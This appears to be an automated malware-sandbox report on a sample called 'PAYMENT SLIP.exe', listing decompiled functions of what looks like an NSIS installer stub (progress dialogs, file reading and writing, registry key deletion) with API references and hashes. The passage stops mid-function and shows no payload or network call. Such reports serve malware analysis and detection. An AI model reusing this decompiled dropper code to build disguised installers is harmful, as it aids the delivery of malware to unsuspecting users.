              • "C:\Users\user\Desktop\PAYMENT SLIP.exe" , xrefs: 004067EB
              Memory Dump Source
              • Source File: 00000001.00000002.665305559.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              Similarity
              • API ID: Char$Next$Prev
              • String ID: "C:\Users\user\Desktop\PAYMENT SLIP.exe" $*?|<>/":$C:\Users\user\AppData\Local\Temp\
              • API String ID: 589700163-1499207792
              • Opcode ID: ad42b7741e5e7cf852433a5ca926bf711007504176ebaeb0857ba18f273580f2
              • Instruction ID: fdbe35b52bffc5d77a346742aeba0a27372f18d7f8de2c65e324d6b3b11dfc69
              • Opcode Fuzzy Hash: ad42b7741e5e7cf852433a5ca926bf711007504176ebaeb0857ba18f273580f2
              • Instruction Fuzzy Hash: 8211932780261255DB303B559C44AB762E8AF94790B56C83FED8A732C0EB7C4C9286BD
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E004044F9(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
              				struct tagLOGBRUSH _v16;
              				long _t39;
              				long _t41;
              				void* _t44;
              				signed char _t50;
              				long* _t54;
              
              				if(_a4 + 0xfffffecd > 5) {
              					L18:
              					return 0;
              				}
              				_t54 = GetWindowLongW(_a12, 0xffffffeb);
              				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
              					goto L18;
              				} else {
              					_t50 = _t54[5];
              					if((_t50 & 0xffffffe0) != 0) {
              						goto L18;
              					}
              					_t39 =  *_t54;
              					if((_t50 & 0x00000002) != 0) {
              						_t39 = GetSysColor(_t39);
              					}
              					if((_t54[5] & 0x00000001) != 0) {
              						SetTextColor(_a8, _t39);
              					}
              					SetBkMode(_a8, _t54[4]);
              					_t41 = _t54[1];
              					_v16.lbColor = _t41;
              					if((_t54[5] & 0x00000008) != 0) {
              						_t41 = GetSysColor(_t41);
              						_v16.lbColor = _t41;
              					}
              					if((_t54[5] & 0x00000004) != 0) {
              						SetBkColor(_a8, _t41);
              					}
              					if((_t54[5] & 0x00000010) != 0) {
              						_v16.lbStyle = _t54[2];
              						_t44 = _t54[3];
              						if(_t44 != 0) {
              							DeleteObject(_t44);
              						}
              						_t54[3] = CreateBrushIndirect( &_v16);
              					}
              					return _t54[3];
              				}
              			}

              APIs
              • GetWindowLongW.USER32(?,000000EB), ref: 00404516
              • GetSysColor.USER32(00000000), ref: 00404554
              • SetTextColor.GDI32(?,00000000), ref: 00404560
              • SetBkMode.GDI32(?,?), ref: 0040456C
              • GetSysColor.USER32(?), ref: 0040457F
              • SetBkColor.GDI32(?,?), ref: 0040458F
              • DeleteObject.GDI32(?), ref: 004045A9
              • CreateBrushIndirect.GDI32(?), ref: 004045B3
              Memory Dump Source
              • Source File: 00000001.00000002.665305559.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000001.00000002.665292449.0000000000400000.00000002.00020000.sdmp
              • Associated: 00000001.00000002.665364092.0000000000408000.00000002.00020000.sdmp
              • Associated: 00000001.00000002.665378913.000000000040A000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665383681.000000000040C000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665411947.0000000000414000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665438070.0000000000427000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665452320.0000000000435000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665456458.0000000000437000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665468957.000000000043B000.00000002.00020000.sdmp
              Similarity
              • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
              • String ID:
              • API String ID: 2320649405-0
              • Opcode ID: 288dbcc7c85f11a55b3e08142a2a7aff64d3670202badf385cb57de10b60d8c1
              • Instruction ID: b56a63bd10d9b88d704488fa4fc448251793e5de010e462820c933ca6d0d38e3
              • Opcode Fuzzy Hash: 288dbcc7c85f11a55b3e08142a2a7aff64d3670202badf385cb57de10b60d8c1
              • Instruction Fuzzy Hash: F52167B1500B04AFCB31DF68DD48A577BF8AF41714B048A2EEA96A26E1D734D904CF58
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 87%
              			E004026E4(intOrPtr __ebx, intOrPtr __edx, void* __edi) {
              				intOrPtr _t65;
              				intOrPtr _t66;
              				intOrPtr _t72;
              				void* _t76;
              				void* _t79;
              
              				_t72 = __edx;
              				 *((intOrPtr*)(_t76 - 8)) = __ebx;
              				_t65 = 2;
              				 *((intOrPtr*)(_t76 - 0x4c)) = _t65;
              				_t66 = E00402D1C(_t65);
              				_t79 = _t66 - 1;
              				 *((intOrPtr*)(_t76 - 0x10)) = _t72;
              				 *((intOrPtr*)(_t76 - 0x44)) = _t66;
              				if(_t79 < 0) {
              					L36:
              					 *0x42a308 =  *0x42a308 +  *(_t76 - 4);
              				} else {
              					__ecx = 0x3ff;
              					if(__eax > 0x3ff) {
              						 *(__ebp - 0x44) = 0x3ff;
              					}
              					if( *__edi == __bx) {
              						L34:
              						__ecx =  *(__ebp - 0xc);
              						__eax =  *(__ebp - 8);
              						 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __bx;
              						if(_t79 == 0) {
              							 *(_t76 - 4) = 1;
              						}
              						goto L36;
              					} else {
              						 *(__ebp - 0x38) = __ebx;
              						 *(__ebp - 0x18) = E0040649C(__ecx, __edi);
              						if( *(__ebp - 0x44) > __ebx) {
              							do {
              								if( *((intOrPtr*)(__ebp - 0x34)) != 0x39) {
              									if( *((intOrPtr*)(__ebp - 0x24)) != __ebx ||  *(__ebp - 8) != __ebx || E00406113( *(__ebp - 0x18), __ebx) >= 0) {
              										__eax = __ebp - 0x50;
              										if(E004060B5( *(__ebp - 0x18), __ebp - 0x50, 2) == 0) {
              											goto L34;
              										} else {
              											goto L21;
              										}
              									} else {
              										goto L34;
              									}
              								} else {
              									__eax = __ebp - 0x40;
              									_push(__ebx);
              									_push(__ebp - 0x40);
              									__eax = 2;
              									__ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)) = __ebp + 0xa;
              									__eax = ReadFile( *(__ebp - 0x18), __ebp + 0xa, __ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)), ??, ??);
              									if(__eax == 0) {
              										goto L34;
              									} else {
              										__ecx =  *(__ebp - 0x40);
              										if(__ecx == __ebx) {
              											goto L34;
              										} else {
              											__ax =  *(__ebp + 0xa) & 0x000000ff;
              											 *(__ebp - 0x4c) = __ecx;
              											 *(__ebp - 0x50) = __eax;
              											if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
              												L28:
              												__ax & 0x0000ffff = E00406483( *(__ebp - 0xc), __ax & 0x0000ffff);
              											} else {
              												__ebp - 0x50 = __ebp + 0xa;
              												if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa, __ecx, __ebp - 0x50, 1) != 0) {
              													L21:
              													__eax =  *(__ebp - 0x50);
              												} else {
              													__edi =  *(__ebp - 0x4c);
              													__edi =  ~( *(__ebp - 0x4c));
              													while(1) {
              														_t22 = __ebp - 0x40;
              														 *_t22 =  *(__ebp - 0x40) - 1;
              														__eax = 0xfffd;
              														 *(__ebp - 0x50) = 0xfffd;
              														if( *_t22 == 0) {
              															goto L22;
              														}
              														 *(__ebp - 0x4c) =  *(__ebp - 0x4c) - 1;
              														__edi = __edi + 1;
              														SetFilePointer( *(__ebp - 0x18), __edi, __ebx, 1) = __ebp - 0x50;
              														__eax = __ebp + 0xa;
              														if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa,  *(__ebp - 0x40), __ebp - 0x50, 1) == 0) {
              															continue;
              														} else {
              															goto L21;
              														}
              														goto L22;
              													}
              												}
              												L22:
              												if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
              													goto L28;
              												} else {
              													if( *(__ebp - 0x38) == 0xd ||  *(__ebp - 0x38) == 0xa) {
              														if( *(__ebp - 0x38) == __ax || __ax != 0xd && __ax != 0xa) {
              															 *(__ebp - 0x4c) =  ~( *(__ebp - 0x4c));
              															__eax = SetFilePointer( *(__ebp - 0x18),  ~( *(__ebp - 0x4c)), __ebx, 1);
              														} else {
              															__ecx =  *(__ebp - 0xc);
              															__edx =  *(__ebp - 8);
              															 *(__ebp - 8) =  *(__ebp - 8) + 1;
              															 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
              														}
              														goto L34;
              													} else {
              														__ecx =  *(__ebp - 0xc);
              														__edx =  *(__ebp - 8);
              														 *(__ebp - 8) =  *(__ebp - 8) + 1;
              														 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
              														 *(__ebp - 0x38) = __eax;
              														if(__ax == __bx) {
              															goto L34;
              														} else {
              															goto L26;
              														}
              													}
              												}
              											}
              										}
              									}
              								}
              								goto L37;
              								L26:
              								__eax =  *(__ebp - 8);
              							} while ( *(__ebp - 8) <  *(__ebp - 0x44));
              						}
              						goto L34;
              					}
              				}
              				L37:
              				return 0;
              			}









              APIs
              • ReadFile.KERNEL32(?,?,?,?), ref: 00402750
              • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 0040278B
              • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027AE
              • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027C4
                • Part of subcall function 00406113: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00406129
              • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402870
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.665305559.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000001.00000002.665292449.0000000000400000.00000002.00020000.sdmp
              • Associated: 00000001.00000002.665364092.0000000000408000.00000002.00020000.sdmp
              • Associated: 00000001.00000002.665378913.000000000040A000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665383681.000000000040C000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665411947.0000000000414000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665438070.0000000000427000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665452320.0000000000435000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665456458.0000000000437000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665468957.000000000043B000.00000002.00020000.sdmp
              Similarity
              • API ID: File$Pointer$ByteCharMultiWide$Read
              • String ID: 9
              • API String ID: 163830602-2366072709
              • Opcode ID: ab939e13b422882215719eb4d85b304d36e2795fa3dbfbe2acce84fdb36a63bb
              • Instruction ID: 9e8848406421114bacb3fc7d7daa07285f06221c2759d1c737873bd090f70c65
              • Opcode Fuzzy Hash: ab939e13b422882215719eb4d85b304d36e2795fa3dbfbe2acce84fdb36a63bb
              • Instruction Fuzzy Hash: 5951F975D00219ABDF20DF95CA89AAEBB79FF04304F10817BE501B62D0E7B49D82CB58
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E00402FC6(intOrPtr _a4) {
              				short _v132;
              				long _t6;
              				struct HWND__* _t7;
              				struct HWND__* _t15;
              
              				if(_a4 != 0) {
              					_t15 =  *0x420efc; // 0x0
              					if(_t15 != 0) {
              						_t15 = DestroyWindow(_t15);
              					}
              					 *0x420efc = 0;
              					return _t15;
              				}
              				__eflags =  *0x420efc; // 0x0
              				if(__eflags != 0) {
              					return E0040696D(0);
              				}
              				_t6 = GetTickCount();
              				__eflags = _t6 -  *0x42a270;
              				if(_t6 >  *0x42a270) {
              					__eflags =  *0x42a268;
              					if( *0x42a268 == 0) {
              						_t7 = CreateDialogParamW( *0x42a260, 0x6f, 0, E00402F2B, 0);
              						 *0x420efc = _t7;
              						return ShowWindow(_t7, 5);
              					}
              					__eflags =  *0x42a334 & 0x00000001;
              					if(( *0x42a334 & 0x00000001) != 0) {
              						wsprintfW( &_v132, L"... %d%%", E00402FAA());
              						return E004055A4(0,  &_v132);
              					}
              				}
              				return _t6;
              			}








              APIs
              • DestroyWindow.USER32(00000000,00000000), ref: 00402FE1
              • GetTickCount.KERNEL32 ref: 00402FFF
              • wsprintfW.USER32 ref: 0040302D
                • Part of subcall function 004055A4: lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00403040,00000000,?), ref: 004055DC
                • Part of subcall function 004055A4: lstrlenW.KERNEL32(00403040,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00403040,00000000), ref: 004055EC
                • Part of subcall function 004055A4: lstrcatW.KERNEL32(00422728,00403040), ref: 004055FF
                • Part of subcall function 004055A4: SetWindowTextW.USER32(00422728,00422728), ref: 00405611
                • Part of subcall function 004055A4: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405637
                • Part of subcall function 004055A4: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405651
                • Part of subcall function 004055A4: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565F
              • CreateDialogParamW.USER32 ref: 00403051
              • ShowWindow.USER32(00000000,00000005), ref: 0040305F
                • Part of subcall function 00402FAA: MulDiv.KERNEL32(0002F5B0,00000064,00031437), ref: 00402FBF
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.665305559.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000001.00000002.665292449.0000000000400000.00000002.00020000.sdmp
              • Associated: 00000001.00000002.665364092.0000000000408000.00000002.00020000.sdmp
              • Associated: 00000001.00000002.665378913.000000000040A000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665383681.000000000040C000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665411947.0000000000414000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665438070.0000000000427000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665452320.0000000000435000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665456458.0000000000437000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665468957.000000000043B000.00000002.00020000.sdmp
              Similarity
              • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
              • String ID: ... %d%%
              • API String ID: 722711167-2449383134
              • Opcode ID: ab62b393791c357b2b7c3f13276244fc9b242bdab4121adb7888db3a09e72511
              • Instruction ID: a5f4734244b8f6f028ba4000c5489b7d2f6cf4b1dd98660c68856af7419d999b
              • Opcode Fuzzy Hash: ab62b393791c357b2b7c3f13276244fc9b242bdab4121adb7888db3a09e72511
              • Instruction Fuzzy Hash: 1D010470506211EBCB216F64EE0CEAA7B7CAB00B01B10047BF841F11E9DABC4545DB9E
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E00404E4D(struct HWND__* _a4, intOrPtr _a8) {
              				long _v8;
              				signed char _v12;
              				unsigned int _v16;
              				void* _v20;
              				intOrPtr _v24;
              				long _v56;
              				void* _v60;
              				long _t15;
              				unsigned int _t19;
              				signed int _t25;
              				struct HWND__* _t28;
              
              				_t28 = _a4;
              				_t15 = SendMessageW(_t28, 0x110a, 9, 0);
              				if(_a8 == 0) {
              					L4:
              					_v56 = _t15;
              					_v60 = 4;
              					SendMessageW(_t28, 0x113e, 0,  &_v60);
              					return _v24;
              				}
              				_t19 = GetMessagePos();
              				_v16 = _t19 >> 0x10;
              				_v20 = _t19;
              				ScreenToClient(_t28,  &_v20);
              				_t25 = SendMessageW(_t28, 0x1111, 0,  &_v20);
              				if((_v12 & 0x00000066) != 0) {
              					_t15 = _v8;
              					goto L4;
              				}
              				return _t25 | 0xffffffff;
              			}















              APIs
              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404E68
              • GetMessagePos.USER32 ref: 00404E70
              • ScreenToClient.USER32 ref: 00404E8A
              • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404E9C
              • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404EC2
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.665305559.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000001.00000002.665292449.0000000000400000.00000002.00020000.sdmp
              • Associated: 00000001.00000002.665364092.0000000000408000.00000002.00020000.sdmp
              • Associated: 00000001.00000002.665378913.000000000040A000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665383681.000000000040C000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665411947.0000000000414000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665438070.0000000000427000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665452320.0000000000435000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665456458.0000000000437000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665468957.000000000043B000.00000002.00020000.sdmp
              Similarity
              • API ID: Message$Send$ClientScreen
              • String ID: f
              • API String ID: 41195575-1993550816
              • Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
              • Instruction ID: 8ba846b23e886e731abba7044b613a2dc07349659d22c8c6246ceab34d3a3da9
              • Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
              • Instruction Fuzzy Hash: C0015E7190021DBADB00DBA4DD85FFEBBBCAF54711F10012BBB50B61C0D7B8AA058BA5
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E00402F2B(struct HWND__* _a4, intOrPtr _a8) {
              				short _v132;
              				void* _t11;
              				WCHAR* _t19;
              
              				if(_a8 == 0x110) {
              					SetTimer(_a4, 1, 0xfa, 0);
              					_a8 = 0x113;
              				}
              				if(_a8 == 0x113) {
              					_t11 = E00402FAA();
              					_t19 = L"unpacking data: %d%%";
              					if( *0x42a274 == 0) {
              						_t19 = L"verifying installer: %d%%";
              					}
              					wsprintfW( &_v132, _t19, _t11);
              					SetWindowTextW(_a4,  &_v132);
              					SetDlgItemTextW(_a4, 0x406,  &_v132);
              				}
              				return 0;
              			}







              APIs
              • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402F49
              • wsprintfW.USER32 ref: 00402F7D
              • SetWindowTextW.USER32(?,?), ref: 00402F8D
              • SetDlgItemTextW.USER32 ref: 00402F9F
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.665305559.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000001.00000002.665292449.0000000000400000.00000002.00020000.sdmp
              • Associated: 00000001.00000002.665364092.0000000000408000.00000002.00020000.sdmp
              • Associated: 00000001.00000002.665378913.000000000040A000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665383681.000000000040C000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665411947.0000000000414000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665438070.0000000000427000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665452320.0000000000435000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665456458.0000000000437000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665468957.000000000043B000.00000002.00020000.sdmp
              Similarity
              • API ID: Text$ItemTimerWindowwsprintf
              • String ID: unpacking data: %d%%$verifying installer: %d%%
              • API String ID: 1451636040-1158693248
              • Opcode ID: 3624e717fbcf7ea6fd8cb3bfca044f62ca72f15282bbc00cb62a71a2cd90e3ed
              • Instruction ID: 618675c633d4cc4fa353176bd059bfe03840d53555a4d718e50652829a5d94b1
              • Opcode Fuzzy Hash: 3624e717fbcf7ea6fd8cb3bfca044f62ca72f15282bbc00cb62a71a2cd90e3ed
              • Instruction Fuzzy Hash: 4CF01D7050020EABDF206F60DE4ABEA3B78EB00349F00803AFA15A51D0DBBD9559DB59
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 93%
              			E00402947(void* __ebx, void* __eflags) {
              				void* _t26;
              				long _t31;
              				void* _t45;
              				void* _t49;
              				void* _t51;
              				void* _t54;
              				void* _t55;
              				void* _t56;
              
              				_t45 = __ebx;
              				 *((intOrPtr*)(_t56 - 0x38)) = 0xfffffd66;
              				_t50 = E00402D3E(0xfffffff0);
              				 *(_t56 - 0x40) = _t23;
              				if(E00405E88(_t50) == 0) {
              					E00402D3E(0xffffffed);
              				}
              				E0040600D(_t50);
              				_t26 = E00406032(_t50, 0x40000000, 2);
              				 *(_t56 + 8) = _t26;
              				if(_t26 != 0xffffffff) {
              					_t31 =  *0x42a278;
              					 *(_t56 - 0x44) = _t31;
              					_t49 = GlobalAlloc(0x40, _t31);
              					if(_t49 != _t45) {
              						E00403590(_t45);
              						E0040357A(_t49,  *(_t56 - 0x44));
              						_t54 = GlobalAlloc(0x40,  *(_t56 - 0x28));
              						 *(_t56 - 0x10) = _t54;
              						if(_t54 != _t45) {
              							E00403309(_t47,  *((intOrPtr*)(_t56 - 0x2c)), _t45, _t54,  *(_t56 - 0x28));
              							while( *_t54 != _t45) {
              								_t47 =  *_t54;
              								_t55 = _t54 + 8;
              								 *(_t56 - 0x3c) =  *_t54;
              								E00405FED( *((intOrPtr*)(_t54 + 4)) + _t49, _t55, _t47);
              								_t54 = _t55 +  *(_t56 - 0x3c);
              							}
              							GlobalFree( *(_t56 - 0x10));
              						}
              						E004060E4( *(_t56 + 8), _t49,  *(_t56 - 0x44));
              						GlobalFree(_t49);
              						 *((intOrPtr*)(_t56 - 0x38)) = E00403309(_t47, 0xffffffff,  *(_t56 + 8), _t45, _t45);
              					}
              					CloseHandle( *(_t56 + 8));
              				}
              				_t51 = 0xfffffff3;
              				if( *((intOrPtr*)(_t56 - 0x38)) < _t45) {
              					_t51 = 0xffffffef;
              					DeleteFileW( *(_t56 - 0x40));
              					 *((intOrPtr*)(_t56 - 4)) = 1;
              				}
              				_push(_t51);
              				E00401423();
              				 *0x42a308 =  *0x42a308 +  *((intOrPtr*)(_t56 - 4));
              				return 0;
              			}












              APIs
              • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 0040299B
              • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029B7
              • GlobalFree.KERNEL32 ref: 004029F0
              • GlobalFree.KERNEL32 ref: 00402A03
              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402A1B
              • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402A2F
              Memory Dump Source
              • Source File: 00000001.00000002.665305559.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000001.00000002.665292449.0000000000400000.00000002.00020000.sdmp
              • Associated: 00000001.00000002.665364092.0000000000408000.00000002.00020000.sdmp
              • Associated: 00000001.00000002.665378913.000000000040A000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665383681.000000000040C000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665411947.0000000000414000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665438070.0000000000427000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665452320.0000000000435000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665456458.0000000000437000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665468957.000000000043B000.00000002.00020000.sdmp
              Similarity
              • API ID: Global$AllocFree$CloseDeleteFileHandle
              • String ID:
              • API String ID: 2667972263-0
              • Opcode ID: d96938230be506bb3ce62f46d8dc11094feca3525b7110c1e5131bc4c1b7a030
              • Instruction ID: 7dc8c05146b407601171e0863837a653734e4b001a2a5e69b47689ac9694c0d9
              • Opcode Fuzzy Hash: d96938230be506bb3ce62f46d8dc11094feca3525b7110c1e5131bc4c1b7a030
              • Instruction Fuzzy Hash: 3121C171C00124BBDF216FA5DE49D9E7E79AF04364F10023AF964762E1CB794D419BA8
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 77%
              			E00404D3F(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
              				char _v68;
              				char _v132;
              				void* __ebx;
              				void* __edi;
              				void* __esi;
              				signed int _t23;
              				signed int _t24;
              				void* _t31;
              				void* _t33;
              				void* _t34;
              				void* _t44;
              				signed int _t46;
              				signed int _t50;
              				signed int _t52;
              				signed int _t53;
              				signed int _t55;
              
              				_t23 = _a16;
              				_t53 = _a12;
              				_t44 = 0xffffffdc;
              				if(_t23 == 0) {
              					_push(0x14);
              					_pop(0);
              					_t24 = _t53;
              					if(_t53 < 0x100000) {
              						_push(0xa);
              						_pop(0);
              						_t44 = 0xffffffdd;
              					}
              					if(_t53 < 0x400) {
              						_t44 = 0xffffffde;
              					}
              					if(_t53 < 0xffff3333) {
              						_t52 = 0x14;
              						asm("cdq");
              						_t24 = 1 / _t52 + _t53;
              					}
              					_t25 = _t24 & 0x00ffffff;
              					_t55 = _t24 >> 0;
              					_t46 = 0xa;
              					_t50 = ((_t24 & 0x00ffffff) + _t25 * 4 + (_t24 & 0x00ffffff) + _t25 * 4 >> 0) % _t46;
              				} else {
              					_t55 = (_t23 << 0x00000020 | _t53) >> 0x14;
              					_t50 = 0;
              				}
              				_t31 = E00406579(_t44, _t50, _t55,  &_v68, 0xffffffdf);
              				_t33 = E00406579(_t44, _t50, _t55,  &_v132, _t44);
              				_t34 = E00406579(_t44, _t50, 0x423748, 0x423748, _a8);
              				wsprintfW(_t34 + lstrlenW(0x423748) * 2, L"%u.%u%s%s", _t55, _t50, _t33, _t31);
              				return SetDlgItemTextW( *0x429238, _a4, 0x423748);
              			}

              APIs
              • lstrlenW.KERNEL32(00423748,00423748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DE0
              • wsprintfW.USER32 ref: 00404DE9
              • SetDlgItemTextW.USER32 ref: 00404DFC
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.665305559.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              Similarity
              • API ID: ItemTextlstrlenwsprintf
              • String ID: %u.%u%s%s$H7B
              • API String ID: 3540041739-107966168
              • Opcode ID: f073c4526331e437099308c9ea4f4727a83fc85bc9477a72d0d5fe05f0d32628
              • Instruction ID: 1eef4f6c404c38b42470a280790990b5f635bff36f5ff3debe150acb3f73a003
              • Opcode Fuzzy Hash: f073c4526331e437099308c9ea4f4727a83fc85bc9477a72d0d5fe05f0d32628
              • Instruction Fuzzy Hash: 59110873A0412837DB0065ADAC45EDE32989F81374F250237FE26F20D5EA78CD1182E8
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 48%
              			E00402E41(void* __eflags, void* _a4, short* _a8, signed int _a12) {
              				void* _v8;
              				int _v12;
              				short _v536;
              				void* _t27;
              				signed int _t33;
              				intOrPtr* _t35;
              				signed int _t45;
              				signed int _t46;
              				signed int _t47;
              
              				_t46 = _a12;
              				_t47 = _t46 & 0x00000300;
              				_t45 = _t46 & 0x00000001;
              				_t27 = E004063A9(__eflags, _a4, _a8, _t47 | 0x00000009,  &_v8);
              				if(_t27 == 0) {
              					if((_a12 & 0x00000002) == 0) {
              						L3:
              						_push(0x105);
              						_push( &_v536);
              						_push(0);
              						while(RegEnumKeyW(_v8, ??, ??, ??) == 0) {
              							__eflags = _t45;
              							if(__eflags != 0) {
              								L10:
              								RegCloseKey(_v8);
              								return 0x3eb;
              							}
              							_t33 = E00402E41(__eflags, _v8,  &_v536, _a12);
              							__eflags = _t33;
              							if(_t33 != 0) {
              								break;
              							}
              							_push(0x105);
              							_push( &_v536);
              							_push(_t45);
              						}
              						RegCloseKey(_v8);
              						_t35 = E00406931(3);
              						if(_t35 != 0) {
              							return  *_t35(_a4, _a8, _t47, 0);
              						}
              						return RegDeleteKeyW(_a4, _a8);
              					}
              					_v12 = 0;
              					if(RegEnumValueW(_v8, 0,  &_v536,  &_v12, 0, 0, 0, 0) != 0x103) {
              						goto L10;
              					}
              					goto L3;
              				}
              				return _t27;
              			}

              APIs
              • RegEnumValueW.ADVAPI32 ref: 00402E95
              • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402EE1
              • RegCloseKey.ADVAPI32(?,?,?), ref: 00402EEA
              • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F01
              • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F0C
              Memory Dump Source
              • Source File: 00000001.00000002.665305559.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              Similarity
              • API ID: CloseEnum$DeleteValue
              • String ID:
              • API String ID: 1354259210-0
              • Opcode ID: f62ab79c521e370d5556569303502529bbab9984cd7072d733bebeae98d4866a
              • Instruction ID: 5acf5ff44325b65ef2d3dead3dbb76990f04c91a4d0d8f72c78c18ffef5b4167
              • Opcode Fuzzy Hash: f62ab79c521e370d5556569303502529bbab9984cd7072d733bebeae98d4866a
              • Instruction Fuzzy Hash: 05215A71500109BBDF129F90CE89EEF7A7DEB54348F110076B905B11E0E7B48E54AAA8
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 77%
              			E00401D81(void* __ebx, void* __edx) {
              				struct HWND__* _t30;
              				WCHAR* _t38;
              				void* _t48;
              				void* _t53;
              				signed int _t55;
              				signed int _t60;
              				long _t63;
              				void* _t65;
              
              				_t53 = __ebx;
              				if(( *(_t65 - 0x23) & 0x00000001) == 0) {
              					_t30 = GetDlgItem( *(_t65 - 8),  *(_t65 - 0x28));
              				} else {
              					E00402D1C(2);
              					 *((intOrPtr*)(__ebp - 0x10)) = __edx;
              				}
              				_t55 =  *(_t65 - 0x24);
              				 *(_t65 + 8) = _t30;
              				_t60 = _t55 & 0x00000004;
              				 *(_t65 - 0x38) = _t55 & 0x00000003;
              				 *(_t65 - 0x18) = _t55 >> 0x1f;
